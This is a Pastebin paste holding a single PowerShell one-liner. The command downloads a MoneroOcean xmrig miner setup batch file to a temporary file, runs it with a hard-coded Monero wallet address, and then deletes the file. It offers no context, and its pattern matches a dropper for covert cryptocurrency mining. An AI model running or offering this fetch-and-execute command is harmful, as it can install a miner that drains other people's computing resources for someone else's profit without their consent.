rock6064

xm

Feb 23rd, 2021 (edited)
44
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile 8BvL3kUNPYwWsUW9yumF2igpsbrxhntuQ1ossA7nm5JoED8EZbRvVUYbgw2K14HQREKW7T6Med8wWX9feieYnXhZ7Hy3xS1; Remove-Item -Force $tempfile"
Add Comment
Please, Sign In to add comment